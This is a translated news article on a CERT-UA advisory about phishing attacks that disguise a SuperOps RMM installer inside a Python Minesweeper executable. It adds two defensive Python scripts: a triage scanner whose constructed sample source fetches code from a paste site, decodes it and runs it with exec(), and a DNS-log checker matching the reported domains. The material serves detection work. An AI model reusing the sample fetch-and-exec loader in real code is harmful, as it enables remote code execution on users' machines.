Ukrainian CERT warns of attacks with Minesweeper

The CERT-UA warns of targeted attacks to gain unauthorized access to computers. The perpetrators use Minesweeper as bait.

Stylized image: a laptop showing Minesweeper, surrounded by viruses

Games bring malware with them.

(Image: created with AI in Bing Designer by heise online / dmk)

This article was originally published in German and has been automatically translated.

The CERT of Ukraine (CERT-UA) warns of targeted attacks with the aim of gaining unauthorized access to computers. European and US financial and insurance organizations may also have been targeted by the attackers.

The attacks were carried out between February and March of this year and were geographically widespread. During the analysis of a cyberattack on a Ukrainian organization, CERT-UA and CSIRT-NBU (the Cyber Security Incident Response Team of the Ukrainian banking system) discovered that the attackers wanted to establish a persistent foothold using a legitimate remote management software called SuperOps RMM.

In the analyzed case, the perpetrators had sent an email with a Dropbox link that pointed to an executable SCR file 33 MB in size. This file was built with PyInstaller and contained, among other things, legitimate Python code for the game Minesweeper and a 28 MB base64-encoded string. Another part of the software downloads Python code from the anotepad.com service, decodes it and finally executes it.

The downloaded code calls the create_license_ver function of Saper (the name of the Python Minesweeper variant) and passes it the 28 MB string and a base64-encoded string from the downloaded script as arguments. The result is a ZIP file protected with a static password that contains an MSI installer for the SuperOps RMM software. This installer is then executed and gives the attackers unauthorized access to the computer over the network.
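The two traits described above, a very large base64 string literal embedded in the Python source and code that fetches further Python from a paste service, decodes it and runs it, are things a defender can look for statically when triaging a suspicious PyInstaller-built executable. The following script is an added example and is not part of the CERT-UA analysis or the heise article; the sample source it scans is constructed here for illustration (the placeholder URL, the threshold values and the finding names are assumptions made for this example). It parses the source with `ast` rather than regexes, so string literals and call sites are recognized regardless of formatting.

```python
import ast
import base64
import binascii
from dataclasses import dataclass

# Hosts the article names as the source of the second-stage code.
SUSPICIOUS_HOSTS = ("anotepad.com",)


@dataclass(frozen=True)
class Finding:
    kind: str    # short category, e.g. "large_base64_literal"
    detail: str  # where in the source it was seen


def looks_like_base64(s: str) -> bool:
    """True if the whole string is valid, padded base64 (strict alphabet check)."""
    if len(s) % 4 != 0:
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except (ValueError, binascii.Error):
        return False


def triage_python_source(source: str, blob_threshold: int = 1_000_000) -> list[Finding]:
    """Static triage of extracted Python source for the traits described in the article.

    blob_threshold: minimum length (in characters) for a string literal to be
    reported as a suspicious embedded blob. 1 MB is an assumed default; the
    sample in the article carried a 28 MB string.
    """
    findings: list[Finding] = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        # 1) Large base64 string constants embedded in the source.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value
            if len(text) >= blob_threshold and looks_like_base64(text):
                findings.append(Finding("large_base64_literal",
                                        f"{len(text)} chars at line {node.lineno}"))
            # 2) References to the remote code source named in the advisory.
            for host in SUSPICIOUS_HOSTS:
                if host in text:
                    findings.append(Finding("remote_code_source",
                                            f"{host} referenced at line {node.lineno}"))
        # 3) Dynamic execution of data, which is how the downloaded code runs.
        if isinstance(node, ast.Call):
            func = node.func
            name = func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)
            if name in ("exec", "eval"):
                findings.append(Finding("dynamic_exec", f"{name}() at line {node.lineno}"))
    return findings


# Constructed sample input: a small stand-in for the extracted loader source.
# The blob is 4000 characters of valid base64 (3000 zero bytes); the URL is a placeholder.
_BLOB = base64.b64encode(b"\x00" * 3000).decode()
SAMPLE_SOURCE = f'''
import base64, urllib.request
LICENSE = "{_BLOB}"
def fetch():
    return urllib.request.urlopen("https://anotepad.com/note/read/PLACEHOLDER").read()
payload = base64.b64decode(fetch())
exec(payload)
'''

BENIGN_SOURCE = '''
import random
def new_board(w, h, mines):
    return random.sample(range(w * h), mines)
'''


if __name__ == "__main__":
    # Lower the threshold so the 4000-character sample blob is reported.
    for f in triage_python_source(SAMPLE_SOURCE, blob_threshold=1000):
        print(f"{f.kind:22} {f.detail}")
```

Any one finding on its own is weak evidence; a licence key is a base64 literal too, and plenty of legitimate code calls `exec`. The combination of all three in one extracted source is what matches the chain described in the article and justifies pulling the file for deeper analysis.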

During further investigation of the attackers' approach, the analysts found five other files similar to the SCR file, which contained the names of financial and insurance institutions in Europe and the USA. These were probably also attacked, but CERT-UA does not provide the specific names. The CERT-UA analysis does list Indicators of Compromise (IOCs) that administrators can use to check whether machines in their networks are affected. Network traffic should also be checked for unexpected connections to *.superops.com or *.superops.ai.
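The article's advice to look for unexpected connections to *.superops.com or *.superops.ai is straightforward to turn into a log check. The script below is an added example, not code from CERT-UA or heise: it scans DNS query log lines in a constructed format, matches the two wildcard patterns on label boundaries (so `superops.com.evil.example` does not match, while the bare `superops.com` and any subdomain do), and suppresses hosts on an allowlist of machines that are known to run SuperOps RMM legitimately. The log format, the host names and the allowlist are assumptions made for this example; adapt the regular expression to whatever your resolver or proxy actually writes.

```python
import re
from dataclasses import dataclass
from typing import Iterable

# Domain patterns from the CERT-UA analysis as reported in the article.
WATCHED_PATTERNS = ("*.superops.com", "*.superops.ai")

# Hypothetical allowlist: hosts where SuperOps RMM is deployed on purpose.
KNOWN_RMM_HOSTS = frozenset({"it-admin-01"})

# Assumed log line format: "<timestamp> host=<client> query=<name> type=<qtype>"
LOG_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) query=(?P<qname>\S+) type=(?P<qtype>\S+)$")


def matches_wildcard(name: str, pattern: str) -> bool:
    """Match a DNS name against a '*.example' pattern on label boundaries.

    '*.example.com' matches 'example.com' and 'a.b.example.com', but not
    'example.com.evil.test' or 'notexample.com'.
    """
    name = name.rstrip(".").lower()
    if pattern.startswith("*."):
        suffix = pattern[2:].lower()
        return name == suffix or name.endswith("." + suffix)
    return name == pattern.lower()


@dataclass(frozen=True)
class Hit:
    ts: str
    host: str
    qname: str
    pattern: str


def scan_dns_log(lines: Iterable[str], allowlist: frozenset = KNOWN_RMM_HOSTS) -> list[Hit]:
    """Return one Hit per query to a watched domain from a host not on the allowlist."""
    hits: list[Hit] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # malformed or unrelated line; skip rather than fail the whole scan
        host, qname = m["host"], m["qname"]
        for pattern in WATCHED_PATTERNS:
            if matches_wildcard(qname, pattern):
                if host not in allowlist:
                    hits.append(Hit(m["ts"], host, qname, pattern))
                break  # one hit per line is enough
    return hits


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    "2024-03-05T10:12:44Z host=ws-17 query=api.superops.ai type=A",
    "2024-03-05T10:12:45Z host=ws-17 query=cdn.example.org type=A",
    "2024-03-05T10:13:01Z host=it-admin-01 query=app.superops.com type=A",
    "2024-03-05T10:13:09Z host=ws-22 query=superops.com.evil.example type=A",
    "2024-03-05T10:14:30Z host=ws-09 query=superops.com type=A",
    "this line is not in the expected format",
]


if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_LOG):
        print(f"{hit.ts} {hit.host} -> {hit.qname} (matched {hit.pattern})")
```

A hit from a workstation that has no business running an RMM agent is the signal the article points at; the allowlist keeps the legitimate admin deployment from drowning it out. The same suffix-matching helper can be reused for proxy or firewall logs once the line parser is adjusted.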

Ukraine's CERT is very active. A month ago, for example, it described attacks on the country's critical infrastructure (KRITIS). According to the findings at the time, the Russian cyber gang Sandworm had planned cyber sabotage against around 20 KRITIS facilities.

(dmk)